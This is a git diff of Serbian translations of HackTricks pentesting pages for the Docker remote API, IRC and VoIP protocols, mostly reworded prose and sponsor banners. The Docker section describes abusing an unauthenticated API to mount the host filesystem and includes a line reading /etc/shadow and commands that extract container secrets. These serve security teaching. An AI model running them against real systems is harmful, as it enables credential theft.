* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# 2375, 2376 Testiranje Docker-a
|
||||
# 2375, 2376 Pentesting Docker
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,21 +6,21 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -32,15 +32,15 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
#### Šta je
|
||||
|
||||
Docker je **vodeća platforma** u industriji **kontejnerizacije**, predvodeći **kontinuiranu inovaciju**. Omogućava jednostavno kreiranje i distribuciju aplikacija, obuhvatajući **tradicionalne i futurističke**, i obezbeđuje njihovo **sigurno implementiranje** u različitim okruženjima.
|
||||
Docker je **vodeća platforma** u industriji **kontejnerizacije**, predvodeći **kontinuiranu inovaciju**. Omogućava jednostavno kreiranje i distribuciju aplikacija, obuhvatajući **tradicionalne do futurističke**, i obezbeđuje njihovo **sigurno implementiranje** u različitim okruženjima.
|
||||
|
||||
#### Osnovna arhitektura Docker-a
|
||||
|
||||
* [**containerd**](http://containerd.io): Ovo je **osnovni izvršni program** za kontejnere, zadužen za sveobuhvatno **upravljanje životnim ciklusom kontejnera**. To uključuje rukovanje **transferom i skladištenjem slika**, kao i nadgledanje **izvršavanja, praćenja i umrežavanja** kontejnera. **Detaljnije uvide** o containerd-u **dalje istražujemo**.
|
||||
* **Container-shim** igra ključnu ulogu kao **posrednik** u rukovanju **glavoboljnim kontejnerima**, besprekorno preuzimajući od **runc** nakon što su kontejneri inicijalizovani.
|
||||
* **Container-shim** igra ključnu ulogu kao **posrednik** u rukovanju **glavama kontejnera**, bez problema preuzimajući od **runc** nakon što su kontejneri inicijalizovani.
|
||||
* [**runc**](http://runc.io): Poštovan zbog svojih mogućnosti **laganog i univerzalnog izvršnog programa za kontejnere**, runc je usklađen sa **OCI standardom**. Koristi ga containerd za **pokretanje i upravljanje kontejnerima** prema **OCI smernicama**, evoluirajući iz originalnog **libcontainer-a**.
|
||||
* [**grpc**](http://www.grpc.io) je ključan za **olakšavanje komunikacije** između containerd-a i **docker-engine-a**, osiguravajući **efikasnu interakciju**.
|
||||
* [**OCI**](https://www.opencontainers.org) je ključan za održavanje **OCI specifikacija** za izvršavanje i slike, pri čemu su najnovije verzije Docker-a **usaglašene sa OCI standardima** za slike i izvršavanje.
|
||||
* [**OCI**](https://www.opencontainers.org) je ključan za održavanje **OCI specifikacija** za izvršavanje i slike, pri čemu su najnovije verzije Dockera **usaglašene sa OCI standardima** za slike i izvršavanje.
|
||||
|
||||
#### Osnovne komande
|
||||
```bash
|
||||
|
@ -69,9 +69,9 @@ docker system prune -a
|
|||
|
||||
**Containerd** je posebno razvijen da zadovolji potrebe platformi za kontejnere poput **Docker-a i Kubernetes-a**, među ostalima. Cilj mu je da **simplifikuje izvršavanje kontejnera** na različitim operativnim sistemima, uključujući Linux, Windows, Solaris i druge, apstrahujući funkcionalnosti specifične za operativni sistem i sistemske pozive. Cilj Containerd-a je da uključi samo osnovne funkcije potrebne njegovim korisnicima, teži da izostavi nepotrebne komponente. Međutim, postizanje ovog cilja u potpunosti se smatra izazovnim.
|
||||
|
||||
Ključna dizajnerska odluka je da **Containerd ne upravlja mrežom**. Mreženje se smatra ključnim elementom u distribuiranim sistemima, sa kompleksnostima poput Softverski definisane mreže (SDN) i otkrivanja servisa koje se značajno razlikuju od jedne platforme do druge. Stoga, Containerd ostavlja upravljanje mrežom platformama koje podržava.
|
||||
Ključna dizajnerska odluka je da **Containerd ne upravlja mrežom**. Mreženje se smatra ključnim elementom u distribuiranim sistemima, sa složenostima poput Softverski definisane mreže (SDN) i otkrivanja usluga koje se značajno razlikuju od jedne platforme do druge. Stoga, Containerd ostavlja upravljanje mrežom da bude vođeno od strane platformi koje podržava.
|
||||
|
||||
Iako **Docker koristi Containerd** za pokretanje kontejnera, važno je napomenuti da Containerd podržava samo podskup funkcionalnosti Docker-a. Konkretno, Containerd nema mogućnosti upravljanja mrežom prisutne u Docker-u i ne podržava direktno kreiranje Docker rojeva. Ova razlika ističe fokusiranu ulogu Containerd-a kao okruženja za izvršavanje kontejnera, prepuštajući specijalizovanije funkcionalnosti platformama sa kojima se integriše.
|
||||
Iako **Docker koristi Containerd** za pokretanje kontejnera, važno je napomenuti da Containerd podržava samo podskup funkcionalnosti Docker-a. Konkretno, Containerd nema mogućnosti upravljanja mrežom prisutne u Docker-u i ne podržava direktno kreiranje Docker rojeva. Ova razlika ističe fokusiranu ulogu Containerd-a kao okruženja za pokretanje kontejnera, prepuštajući specijalizovanije funkcionalnosti platformama sa kojima se integriše.
|
||||
```bash
|
||||
#Containerd CLI
|
||||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||||
|
@ -89,20 +89,20 @@ ctr container delete <containerName>
|
|||
```
|
||||
#### Podman
|
||||
|
||||
**Podman** je open-source kontejnerski motor koji se pridržava [Open Container Initiative (OCI) standarda](https://github.com/opencontainers), razvijen i održavan od strane Red Hata. Ističe se od Docker-a nekoliko različitih karakteristika, posebno svojom **arhitekturom bez demona** i podrškom za **rootless kontejnere**, omogućavajući korisnicima da pokreću kontejnere bez privilegija root korisnika.
|
||||
**Podman** je open-source kontejnerski motor koji se pridržava [Open Container Initiative (OCI) standarda](https://github.com/opencontainers), razvijen i održavan od strane Red Hata. Ističe se od Docker-a nekoliko različitih karakteristika, posebno svojom **arhitekturom bez demona** i podrškom za **rootless kontejnere**, omogućavajući korisnicima da pokreću kontejnere bez root privilegija.
|
||||
|
||||
Podman je dizajniran da bude kompatibilan sa Docker-ovim API-jem, omogućavajući korišćenje Docker CLI komandi. Ova kompatibilnost se proširuje na njegov ekosistem, koji uključuje alate poput **Buildah** za izgradnju kontejnerskih slika i **Skopeo** za operacije sa slikama poput push, pull i inspect. Više detalja o ovim alatima možete pronaći na njihovoj [GitHub stranici](https://github.com/containers/buildah/tree/master/docs/containertools).
|
||||
|
||||
**Ključne Razlike**
|
||||
|
||||
* **Arhitektura**: Za razliku od Docker-ovog modela klijent-server sa pozadinskim demonom, Podman funkcioniše bez demona. Ovaj dizajn znači da kontejneri rade sa privilegijama korisnika koji ih pokreće, poboljšavajući sigurnost eliminacijom potrebe za pristupom root korisnika.
|
||||
* **Arhitektura**: Za razliku od Docker-ovog modela klijent-server sa pozadinskim demonom, Podman funkcioniše bez demona. Ovaj dizajn znači da kontejneri pokreću sa privilegijama korisnika koji ih pokreće, poboljšavajući sigurnost eliminacijom potrebe za root pristupom.
|
||||
* **Systemd Integracija**: Podman se integriše sa **systemd**-om za upravljanje kontejnerima, omogućavajući upravljanje kontejnerima putem systemd jedinica. Ovo se razlikuje od Docker-a koji koristi systemd uglavnom za upravljanje Docker demon procesom.
|
||||
* **Rootless Kontejneri**: Ključna karakteristika Podman-a je sposobnost pokretanja kontejnera pod privilegijama korisnika koji ih pokreće. Ovaj pristup minimizira rizike povezane sa probijanjem kontejnera osiguravajući da napadači dobiju samo privilegije kompromitovanog korisnika, a ne pristup root korisniku.
|
||||
* **Rootless Kontejneri**: Ključna karakteristika Podman-a je sposobnost pokretanja kontejnera pod privilegijama korisnika koji ih pokreće. Ovaj pristup minimizira rizike povezane sa probijanjem kontejnera osiguravajući da napadači dobiju samo privilegije kompromitovanog korisnika, a ne root pristup.
|
||||
|
||||
Pristup Podman-a nudi sigurnu i fleksibilnu alternativu Docker-u, naglašavajući upravljanje privilegijama korisnika i kompatibilnost sa postojećim Docker radnim tokovima.
|
||||
|
||||
{% hint style="info" %}
|
||||
Imajte na umu da kako Podman cilja da podrži isti API kao Docker, možete koristiti iste komande sa Podman-om kao sa Docker-om, kao što su:
|
||||
Imajte na umu da kako Podman cilja da podrži isti API kao Docker, možete koristiti iste komande sa Podman-om kao sa Docker-om kao što su:
|
||||
```bash
|
||||
podman --version
|
||||
podman info
|
||||
|
@ -113,7 +113,7 @@ podman ls
|
|||
|
||||
### Osnovne informacije
|
||||
|
||||
Udaljeni API se podrazumevano pokreće na portu 2375 kada je omogućen. Usluga podrazumevano ne zahteva autentifikaciju, što omogućava napadaču da pokrene privilegovan Docker kontejner. Korišćenjem udaljenog API-ja, moguće je povezati domaćine / (korenski direktorijum) sa kontejnerom i čitati/pisati datoteke u okruženju domaćina.
|
||||
Udaljeni API se podrazumevano pokreće na portu 2375 kada je omogućen. Usluga podrazumevano ne zahteva autentifikaciju, što omogućava napadaču da pokrene privilegovan kontejner. Korišćenjem udaljenog API-ja moguće je povezati hostove / (korenski direktorijum) sa kontejnerom i čitati/pisati fajlove u okruženju hosta.
|
||||
|
||||
**Podrazumevani port:** 2375
|
||||
```
|
||||
|
@ -160,7 +160,7 @@ docker-init:
|
|||
Version: 0.18.0
|
||||
GitCommit: fec3683
|
||||
```
|
||||
Ako možete **kontaktirati udaljeni Docker API pomoću `docker` komande** možete **izvršiti** bilo koju od **prethodno komentarisanih** [**komandi Docker-a**](2375-pentesting-docker.md#basic-commands) kako biste interagirali sa servisom.
|
||||
Ako možete **kontaktirati udaljeni Docker API pomoću `docker` komande** možete **izvršiti** bilo koju od **prethodno komentarisanih** [**komandi Docker-a**](2375-pentesting-docker.md#basic-commands) kako biste komunicirali sa servisom.
|
||||
|
||||
{% hint style="info" %}
|
||||
Možete `export DOCKER_HOST="tcp://localhost:2375"` i **izbeći** korišćenje `-H` parametra sa docker komandom
|
||||
|
@ -226,20 +226,20 @@ cat /mnt/etc/shadow
|
|||
|
||||
### Eskalacija privilegija
|
||||
|
||||
Ako se nalazite unutar hosta koji koristi Docker, možete [**pročitati ove informacije kako biste pokušali da povećate privilegije**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
Ako se nalazite unutar domaćina koji koristi Docker, možete [**pročitati ove informacije kako biste pokušali da povećate privilegije**](../linux-hardening/privilege-escalation/#writable-docker-socket).
|
||||
|
||||
### Otkrivanje tajni u pokrenutim Docker kontejnerima
|
||||
```bash
|
||||
docker ps [| grep <kubernetes_service_name>]
|
||||
docker inspect <docker_id>
|
||||
```
|
||||
Proverite **env** (sekciju sa okruženjskim promenljivama) za tajne informacije i možda ćete pronaći:
|
||||
Proverite **env** (sekciju sa okruženjem) za tajne i možda ćete pronaći:
|
||||
|
||||
* Lozinke.
|
||||
* IP adrese.
|
||||
* Portove.
|
||||
* Putanje.
|
||||
* Ostalo… .
|
||||
* Ostalo... .
|
||||
|
||||
Ako želite da izvučete fajl:
|
||||
```bash
|
||||
|
@ -289,7 +289,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
|
|||
#### Logovanje sumnjive aktivnosti
|
||||
|
||||
* Možete koristiti alat [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) da otkrijete **sumnjivo ponašanje u pokrenutim kontejnerima**.
|
||||
* Pogledajte u sledećem odeljku kako **Falco kompajlira jezgro modula i ubacuje ga**. Nakon toga, učitava pravila i **počinje da beleži sumnjive aktivnosti**. U ovom slučaju je otkriveno da su pokrenuta 2 privilegovana kontejnera, od kojih je jedan imao osetljivu montažu, a nakon nekoliko sekundi je otkriveno kako je otvoren shell unutar jednog od kontejnera.
|
||||
* Obratite pažnju u sledećem odeljku kako **Falco kompajlira jezgro modula i ubacuje ga**. Nakon toga, učitava pravila i **počinje da beleži sumnjive aktivnosti**. U ovom slučaju je otkriveno da su pokrenuta 2 privilegovana kontejnera, od kojih je jedan sa osetljivim mount-om, i nakon nekoliko sekundi je otkriveno kako je otvorena ljuska unutar jednog od kontejnera.
|
||||
```bash
|
||||
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
|
||||
* Setting up /usr/src links from host
|
||||
|
@ -340,13 +340,13 @@ Možete koristiti auditd za praćenje Docker-a.
|
|||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji kradu informacije.
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -359,10 +359,10 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA ČLANSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,15 +14,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,11 +30,11 @@ Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu **besplatno**
|
|||
|
||||
## Osnovne informacije
|
||||
|
||||
IRC, inicijalno **plain text protokol**, dodeljen je **194/TCP** od strane IANA, ali se obično izvršava na **6667/TCP** i sličnim portovima kako bi se izbegla potreba za **root privilegijama** za rad.
|
||||
IRC, koji je prvobitno bio **protokol u obliku običnog teksta**, dodeljen je **194/TCP** od strane IANA, ali se obično izvršava na **6667/TCP** i sličnim portovima kako bi se izbegla potreba za **root privilegijama** za rad.
|
||||
|
||||
**Nadimak** je sve što je potrebno da se povežete sa serverom. Nakon uspostavljanja veze, server vrši obrnuti DNS upit na IP adresu korisnika.
|
||||
Za povezivanje na server potreban je **nadimak**. Nakon uspostavljanja veze, server vrši obrnuti DNS upit na IP adresu korisnika.
|
||||
|
||||
Korisnici su podeljeni u **operatere**, koji trebaju **korisničko ime** i **šifru** za više pristupa, i obične **korisnike**. Operateri imaju različite nivoe privilegija, pri čemu su administratori na vrhu.
|
||||
Korisnici su podeljeni na **operatere**, koji zahtevaju **korisničko ime** i **šifru** za više pristupa, i obične **korisnike**. Operateri imaju različite nivoe privilegija, pri čemu su administratori na vrhu.
|
||||
|
||||
**Podrazumevani portovi:** 194, 6667, 6660-7000
|
||||
```
|
||||
|
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
|
|||
```
|
||||
### Uputstvo
|
||||
|
||||
Ovde možete videti kako da se povežete i pristupite IRC-u koristeći **nasumični nadimak**, a zatim nabrojite neke zanimljive informacije. Više komandi IRC-a možete naučiti [ovde](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
|
||||
Ovde možete videti kako da se povežete i pristupite IRC-u koristeći **nasumično ime** zatim nabrojite neke zanimljive informacije. Više komandi IRC-a možete naučiti [ovde](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
|
||||
```bash
|
||||
#Connection with random nickname
|
||||
USER ran213eqdw123 0 * ran213eqdw123
|
||||
|
@ -95,18 +95,18 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
|||
|
||||
### Shodan
|
||||
|
||||
* `pretraga vašeg imena hosta`
|
||||
* `provera vašeg imena hosta`
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživački motor pokrenut na **dubokom webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov motor **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -116,9 +116,9 @@ Možete posetiti njihovu veb lokaciju i isprobati njihov motor **besplatno** na:
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
|
|
|
@ -6,21 +6,21 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -43,7 +43,7 @@ Ovo je industrijski standard, za više informacija pogledajte:
|
|||
MGCP (Media Gateway Control Protocol) je **signalni** i **kontrolni protokol poziva** opisan u RFC 3435. Radi u centralizovanoj arhitekturi, koja se sastoji od tri glavne komponente:
|
||||
|
||||
1. **Pozivni agent ili kontroler medija (MGC)**: Glavni gateway u MGCP arhitekturi odgovoran je za **upravljanje i kontrolu medijskih gateway-a**. Obavlja procese postavljanja poziva, modifikacije i završetka. MGC komunicira sa medijskim gateway-ima koristeći MGCP protokol.
|
||||
2. **Medijski gateway-i (MGs) ili robovi gateway-a**: Ovi uređaji **konvertuju digitalne medijske tokove između različitih mreža**, kao što su tradicionalna prekidačka telefonska mreža i paketski prekidački IP mreža. Upravljaju ih MGC i izvršavaju komande koje dobijaju od njega. Medijski gateway-i mogu obuhvatiti funkcije poput transkodiranja, paketizacije i otklanjanja eha.
|
||||
2. **Medijski gateway-i (MGs) ili robovi gateway-a**: Ovi uređaji **konvertuju digitalne medijske tokove između različitih mreža**, kao što su tradicionalna prekidačka telefonska mreža i paketski prekidački IP mreža. Upravljaju ih MGC i izvršavaju komande koje dobijaju od njega. Medijski gateway-i mogu uključivati funkcije poput transkodiranja, paketizacije i otklanjanja eha.
|
||||
3. **Signalni gateway-i (SGs)**: Ovi gateway-i su odgovorni za **konvertovanje signalnih poruka između različitih mreža**, omogućavajući besprekornu komunikaciju između tradicionalnih telefonskih sistema (npr. SS7) i IP baziranih mreža (npr. SIP ili H.323). Signalni gateway-i su ključni za interoperabilnost i osiguravanje da se informacije o kontroli poziva pravilno komuniciraju između različitih mreža.
|
||||
|
||||
U suštini, MGCP centralizuje logiku kontrole poziva u pozivnom agentu, što pojednostavljuje upravljanje medijskim i signalnim gateway-ima, pružajući bolju skalabilnost, pouzdanost i efikasnost u telekomunikacionim mrežama.
|
||||
|
@ -56,9 +56,9 @@ SCCP je lak protokol koji pojednostavljuje komunikaciju između servera kontrole
|
|||
|
||||
Glavne komponente sistema zasnovanog na SCCP-u su:
|
||||
|
||||
1. **Server kontrole poziva**: Ovaj server, obično Cisco Unified Communications Manager, upravlja procesima postavljanja poziva, modifikacije i završetka, kao i drugim telefonskim funkcijama poput preusmeravanja poziva, transfera poziva i zadržavanja poziva.
|
||||
